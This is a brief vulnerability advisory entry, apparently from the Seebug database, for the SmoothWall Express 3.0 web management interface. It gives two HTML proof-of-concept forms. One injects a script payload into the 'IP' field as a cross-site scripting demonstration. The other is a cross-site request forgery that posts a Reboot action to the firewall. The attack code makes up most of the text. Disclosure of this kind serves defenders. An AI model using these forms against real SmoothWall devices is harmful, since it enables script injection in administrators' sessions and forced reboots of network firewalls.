SmoothWall Express 3.0 - Multiple Vulnerabilities

ID SSV:70585
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.

                                                The web management interface of SmoothWall Express 3.0 is vulnerable
to xss and csrf.

xss example:

<title> SmoothWall Express 3.0 xss </title>
 <form action=""; method="post"
        <input type="hidden" name="IP" value='"<script>alert(1);</script>'></input>
        <input type="hidden" name="ACTION" value='Run'></input>

csrf example:

<title>  SmoothWall Express 3.0 csrf </title>
 <form action="";
method="post" id="csrfplz">
        <input type="hidden" name="ACTION" value='Reboot'></input>